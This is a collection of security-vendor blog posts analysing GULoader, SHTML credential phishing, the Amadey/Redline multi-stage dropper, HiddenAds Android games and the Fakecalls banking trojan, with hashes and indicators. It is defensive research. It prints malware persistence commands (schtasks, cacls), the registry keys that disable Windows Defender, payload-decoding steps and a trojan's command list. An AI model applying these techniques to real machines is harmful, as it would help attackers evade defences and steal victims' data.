  • The process is repeated untill the the word taken from the downloaded data fully decodes and have a value of 0x4D5A “MZ”. 
  • The value present in the counter when the 4D5A gets decoded is taken as the quasi key. This key is shown as “key-1” in the image below. In the analysed sample the value of this key is “0x5448” 

Decoding Actual Key 

The embedded key in the GULoader shellcode is of the size 371 bytes as discussed before. The quasi key is used to decode the embeded key as shown in the image below. 

  • Each word in the embeded key is XORed with quasi key key-1. 
  • When the interation counter exceeds the size value of 371 bytes, it stops and proceeds to decode the downloaded payload with this new key. 

The decoded 371 bytes of embeded key is shown below in the image below. 

Decoding File 

A byte level decoding happens after embeded key is decoded in the memory. Each byte of the downloaded data is XORed with the key to obtain the actual data, which is a PE file. The decoded data is overwritten to the same buffer used to download the decoded data. 

The final decoded PE file residing in the memory is shown in the image below: 

Finally, the loader loads the PE file by allocating the memory with RWX permission in the stage3 process, based on analyzing multiple samples its either the same process in stage 2 as the child process, or casPol.exe. The loading involved code relocation and IAT correction as expected in such a scenario. The final payload resumes execution from within the hollowed stage3 process. Below malware families are usually seen deployed by the GULoader: 

  • Vidar (Stealer) 
  • Raccoon (Stealer) 
  • Remcos RAT 

Below image shows the injected memory regions in stage3 process caspol.exe in this report. 


The role played by malware loaders popularly known as “crypters” is significant in the deployment of Remote Administration Tools and stealer malwares that target consumer data. The exfiltrated Personal Identifiable Information (PII) extracted from the compromised endpoints are largely collected and funneled to various underground data selling marketplaces. This also impacts businesses as various critical information used for authentication purposes are getting leaked from the personal systems of the user leading to initial access on the company networks. The GuLoader is heavily used in mass malware campaigns to infect the users with popular stealer malware like Raccoon, Vidar, and Redline. Commodity RATs like Remcos are also seen delivered in such campaign activities. On the bright side, it is not difficult to fingerprint malware specimens used in the mass campaigns because of the volume its volume and relevance, detection rules and systems can be built around this very fact. 


Following table summarizes all the dynamically resolved Win32 APIs  

Win32 API 














The post GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader appeared first on McAfee Blog.

New Wave of SHTML Phishing Attacks

8 May 2023 at 11:10

Authored By Anuradha

McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information. 

SHTML Campaign in the field: 

Figure 1. shows the geological distribution of McAfee clients who detect malicious SHTML files. 

Figure 1. McAfee Client Detection of SHTML 


Attackers victimize users by distributing SHTML files as email attachments. The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.  

Figure 2. Email with SHTML attachment 



When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser as shown in Figure 3. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled. 

Figure 3. Fake PDF document 


Figure 4. Fake Excel document 


Figure 5. Fake DHL Shipping document


Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior. 


Figure 6. SHTML with JavaScript code 


Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as: 

Figure 7. Code to load blurred image  


Abusing submission form service: 

Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address. 

The attackers use the URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method.  


Figure 8. as action URL with POST method 


When the user enters the credentials and hits the “submit” button, the data is sent to Subsequently, forwards the information to the specified email address. Below Figure 9. shows the flow of user submission data from webpage to attacker email address. 

Figure 9. Flow of user submission data 


Known malicious forms may be blocked, preventing the form submission data from being sent to the attacker. Below Figure 10. shows the Form blocked due to suspected fraudulent activity. 

Figure 10. Form Blocked 


To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated to a legitimate website. 

Below Figure 11.  shows the redirected webpage.

Figure 11. Redirected webpage 


To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry image phishing scam uses simple basic HTML and JavaScript code, but it can still be effective. A blurry image is enough to trick many users into believing the email as legitimate. To stay protected, users should keep their system up-to-date and refrain from clicking links and opening SHTML attachments that comes through email from untrusted sources. 



McAfee customers are protected against this phishing campaign. 

Type   Value   Product   Detected  
URL   formspree[.]io/f/xjvderkn  McAfee WebAdvisor   Blocked  
URL   cianindustries[].com/error/excel.php  McAfee WebAdvisor   Blocked  


URL   twenty88[.]com/mincs/  McAfee WebAdvisor   Blocked  
URL   sweet.classicbo[.]com/  McAfee WebAdvisor   Blocked  




Type  Value  Product  Detected 
shtml(Adobe)  0a072e7443732c7bdb9d1f3fdb9ee27c  Total Protection and LiveSafe  HTML/Phishing.qz 
shtml(Excel)  3b215a37c728f65c167941e788935677  Total Protection and LiveSafe  HTML/Phishing.rb 
shtml(DHL)  257c1f7a04c93a44514977ec5027446c  Total Protection and LiveSafe  HTML/Phishing.qz 



The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.

Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution

5 May 2023 at 21:30

Authored by By Yashvi Shah 

McAfee Labs have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.  

Wextract.exe is a Windows executable file that is used to extract files from a cabinet (.cab) file. Cabinet files are compressed archives that are used to package and distribute software, drivers, and other files. It is a legitimate file that is part of the Windows operating system, and it is located in the System32 folder of the Windows directory. However, like other executable files, it can be vulnerable to exploitation by malicious actors who might use it as a disguise for malware. 

Some common ways that malicious actors use a fake or modified version of wextract.exe include: 

  1. Malware Distribution: Malicious actors can use a fake version of the wextract.exe to deliver malware onto a victim’s computer. They can disguise the malware as a legitimate file and use the fake wextract.exe to extract and execute the malicious code. 
  2. Information stealing: A fake or modified wextract.exe can be used to steal sensitive information from a victim’s computer. Malicious actors can modify the code to include keyloggers or other data-stealing techniques. 
  3. Remote Access: Malicious actors can use a fake wextract.exe to gain remote access to a victim’s computer. They can use the modified wextract.exe to create a backdoor or establish a remote connection to the victim’s computer, allowing them to carry out various malicious activities. 
  4. Ransomware Delivery: Malicious actors can use a fake or modified “wextract.exe” to install ransomware on a victim’s system. For example, they may create a fake Windows Installer package that appears to be a legitimate software update or utility but also includes a modified “wextract.exe” that encrypts the victim’s files and demands a ransom payment for their decryption.  

McAfee Labs collected malicious wextract.exe samples from the wild, and its behavior was analyzed.  

This blog provides a detailed technical analysis of malicious “wextract.exe” that is used as a delivery mechanism for multiple types of malwares, including Amadey and Redline Stealer. It also provides detailed information on the techniques used by the malware to evade detection by security software and execute its payload. Once the malware payloads are executed on the system, they establish communication with a Command and Control (C2) server controlled by the attacker. This communication allows the attacker to exfiltrate data from the victim’s system, including sensitive information such as login credentials, financial data, and other personal information.

Figure 1: Characteristic of the file 


The file is a 32-bit Portable Executable file, which is 631.50 Kb in size. The original name of the file is WEXTRACT.EXE.MUI. The file description is “Самоизвлечение CAB-файлов Win32”, written in Russian, and means “Self-Extracting Win32 CAB Files”. The legal copyright mentions Microsoft Corporation. A lot of static strings of this file were found to be written in Russian. 

Normally, the resource section (.rsrc) contains resources used by the program, such as icons, bitmaps, strings, and dialog boxes. Attackers leverage the resource section of a PE file to improve the success of their attacks by evading detection, enhancing persistence, and adding functionality. 

The resource section of this sample has multiples files, out of which CABINET resource holds 75.75% of the total file, which makes the said resource suspicious. 

Figure 2: Resources in the file 


A CAB (Cabinet) file is a compressed archive file format that is often used to compress and package multiple files into a single file for distribution or installation. A CAB file in the resource section of a PE file can be used for various purposes such as storing additional program files or data, including language-specific resources, or compressing and storing commonly used resources to reduce the size of the executable.  

The CABINET holds two executables, cydn.exe and vona.exe. 

Figure 3: CABINET in resource section 


Likewise, under RCDATA, there is another attribute called “RUNPROGRAM”, which starts cydn.exe.  RUNPROGRAM in the resource section of a malware file typically refers to a resource that contains instructions for the malware to execute a specific program or command. When the malware is executed, it will load the resource containing the “RUNPROGRAM” command and attempt to execute the specified program or command. This technique is often used by malware authors to execute additional malicious programs or commands on the infected system. For example, the “RUNPROGRAM” resource may contains instructions to download and execute additional malware, or to launch a malicious script or command that can perform various malicious activities such as stealing sensitive data, creating backdoors, or disabling security software. 

Figure 4: RUNPROGRAM attribute stating “cydn.exe” 


Like RUNPROGRAM, POSTRUNPROGRAM also holds the instruction to run the executable after RUNPROGRAM is executed. Hence, once cydn.exe is executed, vona.exe will be executed. 

Figure 5: POSTRUNPROGRAM stating “vona.exe” 

Once WEXTRACT.exe is executed, both cydn.exe and vona.exe is dropped in the TEMP folder. The TEMP folder is a commonly used location for malware to store temporary files and other data, as it is typically writable by any user account and is not usually subject to strict security restrictions. This can make it easier for the malware to operate without raising suspicion or triggering security alerts. 

Figure 6: Files dropped in TEMP folder 

Stage 2: Analysis of cydn.exe 

The file showed high file ratio of the resource section, with the entropy of 7.810. Entropy is a measure of the randomness or unpredictability of the data in the file. It is often used as an indicator of whether a file is likely to be malicious or not. 

In the case of a PE file, high entropy can indicate that the file contains a significant amount of compressed or encrypted data, or that it has been obfuscated or packed in a way that makes it more difficult to analyze. This can be a common technique used by malware authors to evade detection by antivirus software. 


Figure 7: File ratio and entropy of the resource section 


Like the previous file, cydn.exe also had two executables archived in its resource section, named aydx.exe and mika.exe. The “RUNPROGRAM” attribute commands to run aydx.exe and the “POSTRUNPROGRAM” attribute commands to execute mika.exe once aydx.exe is executed. These files are also dropped in TEMP folder. 

Figure 8: aydx.exe and mika.exe packed in resource section 


Figure 9: Executables dropped in another TEMP folder 

The order of file execution is as follows: First, Wextract.exe and cydn.exe, which have already been discussed, are followed by aydx.exe, and then by mika.exe and vona.exe. 


Figure 10: Execution flow 

Stage 3: Analysis of aydx.exe 

Aydx.exe is a 32-bit Portable Executable file, which is 405Kb and is compiled in C/C++. Once executed, it attempts to make a request to IP address: 

Figure 11: Malware trying to connect to IPv4 

This IP address is linked with Redline Stealer connecting on port number 4138. 

Analysis of mika.exe 

Mika.exe is 32-bit Portable Executable, complied in .NET and is just 11 KB in size. The original name of the file is “Healer.exe”. This exe file makes no internet activity but does something in the target machine which assists malwares from further stages to carry out their execution.  

The intent of mika.exe is to turn off Windows Defender in all possible ways. Once mika.exe was executed, this is how the Defender settings of the system looked like: 

Figure 12: Real-time protection turned off 

This setting was irreversible and couldn’t be turned back to on via settings of Windows. Following this, logs from Procmon were analyzed and there were entries regarding Windows defender, such as: 

Figure 13: Procmon logs 

To validate this, Registry was analysed and all the changes were found there. The changes in Registry were found to be in exact order as of Procmon logs. In Windows, the registry is a hierarchical database that stores configuration settings and options for the operating system, as well as for applications and devices. It is used to store information about the hardware, software, user preferences, and system settings on a Windows computer. Following keys are added under Real-Time Protection: 

  • DisableBehaviourMonitoring 
  • DisableIOAVProtection 
  • DisableOnAccessProtection 
  • DisableRealtimeMonitoring 
  • DisableScanOnRealitimeEnable 

Figure 14: Keys added in Registry 

By doing so malware is restricting all the normal users from turning the Windows Defender on. When attackers disable Windows Defender through the registry, the change is likely to persist even if the user or administrator tries to re-enable it through the Windows Defender settings. This allows the attacker to maintain control over the system for a longer period. This supports malwares of further stages to easily execute themselves without any hinderances. This can be leveraged by all the malwares, regardless of their correspondence to this very campaign. 

Stage 4: Analysis of vona.exe 

Vona.exe, a variant of the Amadey malware family, is compiled in C/C++ and is 236 KB in size. This is the last file to be executed from the current cluster.  When executed, a highly extensive process tree quickly appeared. 

Figure 15: Process tree of vona.exe 


Stage 5: Analysis of mnolyk.exe 

An immediate child process of vona.exe is mnolyk.exe, another Amadey component, is dropped in a folder in TEMP folder. 


Figure 16: mnolyk.exe dropped in TEMP folder 

Mnolyk.exe makes active connections to IP addresses and 

Malicious DLLs are downloaded from, which are executed later in the campaign. The target was made to search for two different DLLs, namely cred.dll and clip.dll. 

Figure 17: Malicious dlls downloaded 


From, various exe files are downloaded to the TEMP folder, and later executed. Exes downloaded are: 


Figure 18: fuka.exe 



Figure 19: nikas.exe 


Figure 20: igla.exe 


Figure 21: nocr.exe 


Figure 22: lebro.exe 


Following the execution of mnolyk.exe, a series of schtasks.exe and cacls.exe were executed. 

The command line for schtasks.exe is “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR “C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe” /F 

  • “/Create” – This is the command to create a new scheduled task. 
  • “/SC MINUTE” – This parameter sets the scheduling interval for the task to “MINUTE”. The task will run every minute. 
  • “/MO 1” – This parameter sets the repeat count to “1”. The task will run only once. 
  • “/TN” – This parameter specifies the name of the task. The name should be specified after the “/TN” parameter. 

So, the entire command line “schtasks.exe /Create /SC MINUTE /MO 1 /TN” would create a scheduled task that runs once every minute. The name of the task specified is the path to mnolyk.exe. 


There were several instances of cacls.exe created. One of them is explained here along with its parameter. The command line is “CACLS  ”mnolyk.exe” /P “test:R” /E” 

  • “CACLS” – This is the command to change the ACL of a file. 
  • “mnolyk.exe” – This is the file for which the ACL will be modified. 
  • “/P test:R” – This parameter specifies the permission change for a user named “test”. The “:R” at the end indicates that the “test” user will be granted “Read” permission. 
  • “/E” – This parameter specifies that the ACL change will be made to the file’s effective ACL. The effective ACL is the actual set of permissions that are applied to the file. 

So, the entire command line “CACLS mnolyk.exe /P test:R /E” would grant the “test” user or group “Read” permission to the “mnolyk.exe” file. Hence the user “test” can neither write nor delete this file. If in place of “/P test:R”, “/P test:N” was mentioned, which is mentioned in one of the command line, it would give “None” permission to the user. 


Stage 6: Analyzing fuka.exe, nikas.exe, igla.exe, nocr.exe and lebro.exe 


Fukka.exe, a variant of the Redline Stealer malware family, is 175 KB and is compiled in .NET. The original name of the file is Samarium.exe. It shows some network activity with IP 

Figure 23: Network activity of fuka.exe 


Nikas.exe is 248 KB executable file compiled in C/C++. It disables automatic updates for Windows and checks the status of all the sub-fields of Real-Time Protection that were previously changed by mika.exe. No network activity was found during replication. 


Igla.exe is 520 KB file, compiled in C/C++. The original name of the file is WEXTRACT.EXE.MUI. Like we saw in cydn.exe, this PE has also two more exes packed in its resource section, bvPf.exe and cmkmka.exe. Once igla.exe is executed, bvPf.exe is executed, followed by cmkmka.exe. 

Figure 24: RUNPROGRAM attribute in igla.exe 


Figure 25: POSTRUNPROGRAM attribute in igla.exe 



bvPf.exe is 306 KB in size and is compiled in C/C++.  The original filename is nightskywalker.exe. The file is dropped in a folder in TEMP folder of the system. 

The exe has tried connecting to, but server did not respond, and no communication took place. 


cmkmka.exe is 32-bit PE file, 283.5 KB in size. It further launches AppLaunch.exe which communicates to C2. 

It communicates to the IP address: which is an active C2 for Redline Stealer and connects to the port 4132. 


Figure 26: Data exfiltration 


The blue-colored content in the data indicates the information being transmitted from the Command and Control (C2) server, which is providing instructions to the malware regarding the specific data that needs to be retrieved along with their corresponding paths. These paths include user profiles of different web browsers, various crypto wallet paths, and other related data. 

As a response, all the data residing at the specified paths is sent back to the C2 server of the malware. This includes all the profiles of different web browsers, information related to crypto wallets, and even user-related data from the Windows operating system. This process allows the C2 server to collect a vast amount of sensitive information from the infected system, which could be exploited by the attackers for malicious purposes. 


Nocr.exe, a component of Redline Stealer, is a 175 KB .NET binary. The original name of the file is Alary.exe.  It communicates to the IP address 


Lebro.exe, a component of Amadey, is a 235 KB file, compiled in C/C++. Lebro.exe is responsible for executing nbveek.exe, which is a next stage of the malware. The file is again dropped in TEMP folder. 

Figure 27: Dropping another executable in TEMP folder 

Stage 7: Analyzing nbveek.exe 

The hashes of lebro.exe and nbveek.exe are same, they are the same binaries, hence it is Amadey. It is connecting to IP  


Figure 28: Network activity of nbveek.exe 


The target system executes a php file, and the content of file includes the command to download another exe called setupff.exe. This exe is downloaded to the TEMP folder. 

Before setupff.exe is executed, again the series of schtasks.exe and cacls.exe are executed which were seen previously also. The same parameters were passed for nbveek.exe as they were for mnolyk.exe. 


Setupff.exe is compiled in C/C++ and is 795 KB.  The file could not execute and threw Windows error. 

Stage 8: Final stage 

Later, another instance of setupff.exe was created which further invokes multiple instances of rundll32.exe. Here, the two dlls downloaded by mnolyk.exe, clip64.dll and cred64.dll, are executed through rundll32.exe. McAfee Labs detects these dlls to be Amadey maware. 

The network activity shows the dll to be connecting to This dll again starts exfiltrating data to C2: 


Figure 29:Data exfiltration 


To conclude, the threat posed by the multi-stage attack that drops the Amadey botnet, and subsequently Redline Stealer, is significant and requires constant vigilance from both consumers and security professionals. By using the Amadey botnet as a delivery mechanism for other malware, attackers can leverage these same capabilities to evade detection and maintain persistence on infected computers. They can use Amadey to drop a wide range of malware, such as spyware, ransomware, and trojans, which can be used for a variety of malicious purposes, such as stealing sensitive information, encrypting files for ransom, or taking control of a computer for use in a larger botnet. Our analysis of various samples of this attack has revealed that the Amadey botnet distributes malware from multiple families and is not restricted to Redline Stealer alone. 

At McAfee, we are committed to providing our customers with robust and effective antivirus and anti-malware solutions that can detect and protect against threats like the Amadey botnet and other malware families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats before they can cause damage. 


Indicators of Compromise (IOCs): 

File Type  SHA-256  Product  Detection 
.exe  80fed7cd4c7d7cb0c05fe128ced6ab2b9b3d7f03edcf5ef532c8236f00ee7376  Total Protection and LiveSafe  Downloader-FCND
.exe  d8e9b2d3afd0eab91f94e1a1a1a0a97aa2974225f4f086a66e76dbf4b705a800  Total Protection and LiveSafe  PWS-FDON
.exe  1d51e0964268b35afb43320513ad9837ec6b1c0bd0e56065ead5d99b385967b5  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38  Total Protection and LiveSafe  PWS-FDON 
.exe  6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116  Total Protection and LiveSafe  Downloader-FCND 
.exe  6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116  Total Protection and LiveSafe  Downloader-FCND 
.exe  8020580744f6861a611e99ba17e92751499e4b0f013d66a103fb38c5f256bbb2  Total Protection and LiveSafe  AgentTesla-FCYU 
.exe  021ae2fadbc8bc4e83013de03902e6e97c2815ab821adaa58037e562a6b2357b  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  aab1460440bee10e2efec9b5c83ea20ed85e7a17d4ed3b4a19341148255d54b1  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  54ce28a037eea87448e65bc25f8d3a38ddd4b4679516cc59899b77150aa46fcc  Total Protection and LiveSafe  GenericRXVK-HF 
.exe  0cca99711baf600eb030bbfcf279faf74c564084e733df3d9e98bea3e4e2f45f  Total Protection and LiveSafe  AgentTesla-FCYU 
.exe  ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b  Total Protection and LiveSafe  Downloader-FCND 
.exe  ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b  Total Protection and LiveSafe  Downloader-FCND 
.exe  d40d2bfa9fcbf980f76ce224ab6037ebd2b081cb518fa65b8e208f84bc155e41  Total Protection and LiveSafe  GenericRXVJ-QP 
.dll  cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0  Total Protection and LiveSafe  PWS-FDOE 
.dll  10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8  Total Protection and LiveSafe  Trojan-FUUW 
.dll  3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405  Total Protection and LiveSafe  Trojan-FUUW 


The post Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution appeared first on McAfee Blog.

HiddenAds Spread via Android Gaming Apps on Google Play

27 April 2023 at 00:13

Authored by Dexter Shin 

Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative. 

Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are so many games with the same concept as Minecraft worldwide. Even on Google Play, we can easily search for similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to send packets stealthily for advertising revenue in bulk.  

McAfee, a member of the App Defense Alliance, focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security. 

How is it distributed to users? 

They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads. 

Figure 1. 10M+ downloaded app being one of them 

Also, because they can play the game, users can’t notice the large amount of advertising packets being generated on their devices. 

Figure 2. Game screen that can be played 

What does it do?

After the game is running, the user can play without any problems in the block-based world, only like Minecraft-type games. However, advertisement packets of various domains continuously occur on the device. For example, the four packets shown in the picture are questionable packets generated by the ads libraries of Unity, Supersonic, Google, and AppLovin. Unfortunately, nothing is displayed on the game screen. 

Figure 3. Continuous advertising packets 

What’s even more interesting is the initial network packets of these games. The structure of the initial packet is very similar. All domains are different. But using 3.txt as the path is equivalent. That is, packets in the form of https://(random) commonly occur first. The picture below is an example of the first packet extracted from three different apps. 

Figure 4. Similarity of the initial packet form 

Users affected worldwide 

This threat has been detected in various countries around the world. Indicated by our telemetry, the threat has been most prominently detected in the United States, Canada, South Korea, and Brazil.


Figure 5. Users around the world who are widely affected 


As we featured in the McAfee 2023 Consumer Mobile Threat Report, one of the most accessible content for young people using mobile devices is games. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but they can easily trust games from official stores such as Google Play. 


We first recommend that users thoroughly review user reviews before downloading applications from the store. And users should install security software on their devices and always keep up to date. 


Indicators of Compromise 


Package Name  Application Name  SHA256  GooglePlay 

Downloads  Block Box Master Diamond  300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857  10M+  Craft Sword Mini Fun  72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137  5M+  Block Box Skyland Sword  d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b  5M+  Craft Monster Crazy Sword  cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851  5M+  Block Pro Forrest Diamond  08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af  1M+  Block Game Skyland Forrest  34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb  1M+  Block Rainbow Sword Dragon  23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5  1M+  Craft Rainbow Mini Builder  88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068  1M+  Block Forrest Tree Crazy  010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf  1M+  Craft Clever Monster Castle  11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224  500K+  Block Monster Diamond Dragon  19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0  500K+ 
com.builder.craft.diamond.block.clever.robo  Craft World Fun Robo  746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853  500K+ 
com.block.master.boy.craft.cliffs.diamond  Block Pixelart Tree Pro  25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397  500K+  Craft Mini Lucky Fun  9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff  500K+  Block Earth Skyland World  b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed  500K+  Block Rainbow Monster Castle  d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1  500K+  Block Fun Rainbow Builder  f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f  500K+  Craft Dragon Diamond Robo  e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9  500K+ 
com.lucky.robo.craft.loki.block.good  Block World Tree Monster  06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d  100K+  Block Diamond Boy Pro  122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0  100K+  Block Lucky Master Earth  e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15  100K+  Craft Forrest Mini Fun  e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16  100K+  Craft Sword City Pro  318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25  100K+ 
com.cell.rain.block.craft.loki.fairy  Block Loki Monster Builder  4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534  100K+  Block Boy Earth Mini  3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00  100K+ 
com.fairy.builder.sun.skyland.craft.block  Block Crazy Builder City  537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22  100K+  Craft Sword Vip Pixelart  5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad  100K+  Block City Fun Diamond  698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7  100K+  Craft City Loki Rainbow  ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c  100K+  Craft Boy Clever Sun  77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b  100K+  Block City Dragon Sun  ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368  100K+  Craft Loki Forrest Monster  a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4  100K+  Lokicraft: Forrest Survival 3D  0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84  50K+ 
com.sun.realm.craft.lucky.dragon.block  Craft Castle Sun Rain  1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674  50K+  Craft Game Earth World  7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525  50K+  Craft Lucky Castle Builder  de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535  50K+ 
com.JavaKidz.attacksnake  Craftsman: Building City 2022  e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37  50K+  Craft Rainbow Pro Rain  a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f  50K+ 


The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.

Fakecalls Android Malware Abuses Legitimate Signing Key

21 April 2023 at 01:27

Authored by Dexter Shin 

McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that all applications must be signed with a key, in other words a keystore, so they can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. That is the case of this Android banking trojan that uses this legitimate signing key to bypass signature-based detection techniques. And these banking trojans weren’t distributed on Google Play or official app stores until now. This threat had been disclosed to the company that owns the legitimate key last year and the company has taken precautions. The company has confirmed that they have replaced the signing key and currently, all their legitimate apps are signed with a new signing key. 

Android malware using a legitimate signing key 

While tracking the Android banking trojan Fakecalls we found a sample using the same signing key as a wellknown app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app as they use the same icon as the real banking apps. 

Figure 1. Malware and legitimate app on Google Play 

Distribution method and latest status 

Domains verified last August when we first discovered the samples are now down. However, we investigated URLs related to this malware and we found similar ones related to this threat. Among them, we identified a phishing site that is still alive during our research. The site is also disguised as a banking site. 

Figure 2. A phishing page disguised as a Korean banking site 

We also found that they updated the domain information of this web page a few days before our investigation. 

So we took a deeper look into this domain and we found additional unusual IP addresses that led us to the Command and control(C2) server admin pages used by the cybercriminals to control the infected devices. 


Figure 3. Fakecalls Command and control(C2) admin pages 

How does it work 

When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below. 

Figure 4. Tencent’s Legu Packer libraries 

After decrypting the DEX file, we found some unusual functionality. The code below gets the Android package information from a file with a HTML extension. 

 Figure 5. Questionable code in the decrypted DEX file 

This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser. 

Figure 6. APK file disguised as an HTML file 

When the user launches the malware, it immediately asks for permission to install another app. Then it tries to install an application stored in the assets directory as introduction.html”. Theintroduction.html” is an APK file and real malicious behavior happens here. 

Figure 7. Dropper asks you to install the main payload 

When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information. 

Figure 8. Permissions required by the main malicious application 

It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server. 

 Figure 9. Services and receivers registered by the main payload

By contrast, the malware uses a legitimate push SDK to receive commands from a remote server. Here are the complete list of commands and their purpose. 


Command name  Purpose 
note  sms message upload 
incoming_transfer  caller number upload 
del_phone_record  delete call log 
zhuanyi  set call forwarding with parameter 
clear_note  delete sms message 
assign_zhuanyi  set call forwarding 
file  file upload 
lanjie  block sms message from specified numbers 
allfiles  find all possible files and upload them 
email_send  send email 
record_telephone  call recording on 
inout  re-mapping on C2 server 
blacklist  register as blacklist 
listener_num  no function 
no_listener_num  disable monitoring a specific number 
rebuild  reset and reconnect with C2 
deleteFile  delete file 
num_address_list  contacts upload 
addContact  add contacts 
all_address_list  call record upload 
deleteContact  delete contacts 
